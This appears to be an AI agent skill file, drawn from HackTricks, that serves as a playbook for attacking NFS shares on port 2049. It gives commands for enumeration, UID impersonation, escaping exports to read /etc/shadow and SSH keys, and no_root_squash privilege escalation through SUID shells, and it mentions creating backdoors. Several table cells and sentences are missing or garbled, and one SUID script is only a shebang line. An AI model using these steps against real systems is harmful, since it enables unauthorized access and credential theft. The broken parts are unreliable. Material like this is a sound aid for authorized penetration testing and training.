Hacktricks-skills nfs-pentesting
Pentest NFS (Network File System) services on port 2049. Use this skill whenever the user mentions NFS, network file sharing, port 2049, showmount, nfs exports, or needs to enumerate/mount/exploit NFS shares. This skill helps with NFS enumeration, mounting shares, exploiting misconfigurations like no_root_squash, escaping export directories, and privilege escalation via NFS.
install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest:
skills/network-services-pentesting/nfs-service-pentesting/SKILL.MDsource content
NFS Pentesting Skill
A comprehensive guide for pentesting NFS (Network File System) services, covering enumeration, exploitation, and privilege escalation techniques.
When to Use This Skill
Use this skill when:
- You need to enumerate NFS shares on a target
- You want to mount NFS shares for access
- You're investigating NFS misconfigurations
- You need to exploit NFS for privilege escalation
- Port 2049 is open on a target
- The user mentions NFS, showmount, nfs exports, or network file sharing
Quick Reference
# Basic enumeration showmount -e <IP> nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 <IP> # Mount a share mount -t nfs -o vers=2 <IP>:/share /mnt/local -o nolock # Check for dangerous configurations nfs_analyze <IP>
NFS Basics
What is NFS?
NFS (Network File System) is a client/server protocol that enables users to access files over a network as if they were local. Key characteristics:
- Default port: 2049/TCP/UDP
- Authentication: Typically relies on UNIX UID/GID identifiers
- Security concern: Client-provided user information is trusted by the server
- Root impersonation: By default, UID 0 (root) is squashed to prevent root access
NFS Versions
| Version | Characteristics |
|---|---|
| NFSv2 | Oldest, UDP-based, no authentication/authorization |
| NFSv3 | Enhanced error reporting, variable file sizes |
| NFSv4 | Kerberos support, firewall-friendly, stateful, ACL support |
Important: NFSv2 is preferred for pentesting due to lack of authentication requirements.
Squashing Behavior
| Setting | Effect |
|---|---|
| All users mapped to |
| Default - only UID 0 squashed to |
| Root access preserved - DANGEROUS |
Enumeration
Step 1: Basic Enumeration with showmount
# List available exports showmount -e <IP> # List all information showmount <IP>
Example output:
Export list for 10.12.0.150: /backup 192.168.0.0/24 /home 10.0.0.0/8
Step 2: Nmap Scripts
# Comprehensive NFS enumeration nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 <IP> # Individual scripts nmap --script=nfs-ls -p 2049 <IP> # List exports and permissions nmap --script=nfs-showmount -p 2049 <IP> # Like showmount -e nmap --script=nfs-statfs -p 2049 <IP> # Disk statistics
Step 3: Advanced Analysis with nfs_analyze
The
nfs_analyze# Install pip install nfs-security-tooling # Run analysis nfs_analyze <IP>
This tool checks for:
- Available mounts
- Supported NFS versions
- Connected IPs
- Export escape possibilities
configurationno_root_squash
Step 4: Metasploit Scanner
# In msfconsole use scanner/nfs/nfsmount set RHOSTS <IP> run
Mounting NFS Shares
Basic Mount
# Create local mount point mkdir -p /mnt/nfs_target # Mount the share (prefer NFSv2 for pentesting) mount -t nfs -o vers=2 <IP>:/remote/path /mnt/nfs_target -o nolock # Example mount -t nfs -o vers=2 10.12.0.150:/backup /mnt/nfs_target -o nolock
Mount Options Explained
| Option | Purpose |
|---|---|
| Specify NFS filesystem type |
| Use NFSv2 (no authentication) |
| Disable locking (useful for pentesting) |
| Optimize transfer size |
Verify Mount
# Check mounted filesystems mount | grep nfs # List NFS mounts showmount -a <IP>
Exploitation Techniques
Technique 1: UID/GID Impersonation
NFS trusts client-provided UID/GID values. Exploit this by:
-
Identify target file ownership:
ls -la /mnt/nfs_target/ # Note the UID of files you want to access -
Create local user with matching UID:
# If file is owned by UID 1001 useradd -u 1001 pentest_user su - pentest_user -
Access the files:
cd /mnt/nfs_target/ # Now you can access files owned by UID 1001
Technique 2: Using fuse_nfs
The
fuse_nfs# Install pip install nfs-security-tooling # Use fuse_nfs to access files fuse_nfs <IP>:/export /mnt/local
Technique 3: Export Directory Escape
If
subtree_check# If /srv is exported but /var is on same filesystem cd /mnt/nfs_target/ cd ../../var/log/ # Escape to /var/log # Read sensitive files cat /etc/shadow cat /var/log/auth.log
Why this works:
is owned by root:shadow (GID 42 on Debian)/etc/shadow- Only UID 0 is squashed by default
- Group access is not restricted
Technique 4: no_root_squash Exploitation
If
no_root_squash# Mount as root mount -t nfs -o vers=2 <IP>:/share /mnt/nfs_target -o nolock # You now have root access to the share cd /mnt/nfs_target/ # Create SUID binaries, modify files, etc.
Technique 5: Using NFSShell
NFSShell simplifies NFS exploitation:
# Install git clone https://github.com/NetDirect/nfsshell cd nfsshell python3 nfsshell.py # Usage nfsshell <IP>:/export
Features:
- Easy listing and mounting
- UID/GID manipulation
- File access automation
Privilege Escalation
Via no_root_squash
-
Mount with root access:
mount -t nfs -o vers=2 <IP>:/share /mnt/nfs_target -o nolock -
Create SUID binary:
cp /bin/bash /mnt/nfs_target/bash_suid chmod 4755 /mnt/nfs_target/bash_suid -
Execute from target:
# On the NFS server /mnt/nfs_target/bash_suid -p
Via UID Matching
-
Find high-privilege files:
find /mnt/nfs_target -uid 0 -type f 2>/dev/null -
Match UID locally:
useradd -u 0 root_clone # If no_root_squash # Or match specific UID useradd -u 1000 target_user -
Access and modify:
su - target_user # Modify files, create backdoors, etc.
Dangerous NFS Settings
| Setting | Risk | Detection |
|---|---|---|
| Read/write access | Check exports |
| Allows ports >1024 | Check exports |
| Root access preserved | nfs_analyze |
| All UIDs preserved | nfs_analyze |
| Nested FS visible | Check exports |
| Export escape possible | nfs_analyze |
Configuration Files
On the NFS server, check:
# Main exports configuration /etc/exports # NFS state information /etc/lib/nfs/etab
Common Attack Scenarios
Scenario 1: Initial Access via NFS
# 1. Enumerate showmount -e 10.10.10.180 # 2. Mount mkdir -p /mnt/nfs mount -t nfs -o vers=2 10.10.10.180:/home /mnt/nfs -o nolock # 3. Check file ownership ls -la /mnt/nfs/ # 4. Match UID if needed useradd -u 1000 pentest su - pentest # 5. Access files cd /mnt/nfs/ cat .ssh/id_rsa
Scenario 2: Privilege Escalation
# 1. Check for no_root_squash nfs_analyze 10.10.10.180 # 2. If enabled, mount as root mount -t nfs -o vers=2 10.10.10.180:/share /mnt/nfs -o nolock # 3. Create SUID binary echo '#!/bin/bash' > /mnt/nfs/shell chmod 4755 /mnt/nfs/shell # 4. Trigger from target # (requires access to target system)
Scenario 3: Export Escape
# 1. Mount exported directory mount -t nfs -o vers=2 10.10.10.180:/srv /mnt/nfs -o nolock # 2. Escape to parent filesystem cd /mnt/nfs/../../etc/ # 3. Read sensitive files cat shadow cat passwd # 4. Check for writable directories find /mnt/nfs/../../var -writable 2>/dev/null
Tools Summary
| Tool | Purpose | Installation |
|---|---|---|
| Basic enumeration | |
| Advanced enumeration | Built-in |
| Comprehensive analysis | |
| UID/GID manipulation | |
| Interactive exploitation | |
| Metasploit | Automated scanning | Built-in |
Best Practices
- Always try NFSv2 first - No authentication required
- Check for no_root_squash - Most impactful misconfiguration
- Test export escape - Default on Linux
- Match UIDs - Access files owned by specific users
- Use nfs_analyze - Comprehensive vulnerability detection
- Document findings - Track which techniques worked